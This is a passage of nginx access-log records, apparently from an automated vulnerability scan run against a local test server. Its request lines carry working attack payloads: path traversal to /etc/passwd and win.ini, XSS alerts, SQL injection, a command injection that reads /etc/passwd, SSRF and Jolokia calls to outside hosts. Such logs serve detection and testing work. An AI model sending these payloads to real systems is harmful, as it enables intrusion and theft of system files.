+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://c9v8hn0smpv8c57g0t00ufh9gu8i9rf4a.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/apcupsd/multimon.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/multimon.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationendpoint/297mdq8fdatfgvocyaru2vorkyk.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aims/ps/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CACHE/sdesktop/install/start.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aqsm_remove_file_fd_question\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22file_url\x22\x0D\x0A\x0D\x0A{{fullpath}}wp-content/plugins/quiz-master-next/README.md\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concrete5/index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translations/en.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wp/v2/users/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RichWidgets/Popup_Upload.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"{\x22dashboard\x22:{\x22annotations\x22:{\x22list\x22:[{\x22name\x22:\x22Annotations & Alerts\x22,\x22enable\x22:true,\x22iconColor\x22:\x22rgba(0, 211, 255, 1)\x22,\x22type\x22:\x22dashboard\x22,\x22builtIn\x22:1,\x22hide\x22:true}]},\x22editable\x22:true,\x22gnetId\x22:null,\x22graphTooltip\x22:0,\x22id\x22:null,\x22links\x22:[],\x22panels\x22:[],\x22schemaVersion\x22:18,\x22snapshot\x22:{\x22originalUrl\x22:\x22javascript:alert('Revers3c')\x22,\x22timestamp\x22:\x222020-03-30T01:24:44.529Z\x22},\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{\x22from\x22:null,\x22to\x22:\x222020-03-30T01:24:53.549Z\x22,\x22raw\x22:{\x22from\x22:\x226h\x22,\x22to\x22:\x22now\x22}},\x22timepicker\x22:{\x22refresh_intervals\x22:[\x225s\x22,\x2210s\x22,\x2230s\x22,\x221m\x22,\x225m\x22,\x2215m\x22,\x2230m\x22,\x221h\x22,\x222h\x22,\x221d\x22],\x22time_options\x22:[\x225m\x22,\x2215m\x22,\x221h\x22,\x226h\x22,\x2212h\x22,\x2224h\x22,\x222d\x22,\x227d\x22,\x2230d\x22]},\x22timezone\x22:\x22\x22,\x22title\x22:\x22Dashboard\x22,\x22uid\x22:null,\x22version\x22:0},\x22name\x22:\x22Dashboard\x22,\x22expires\x22:0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.212","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php 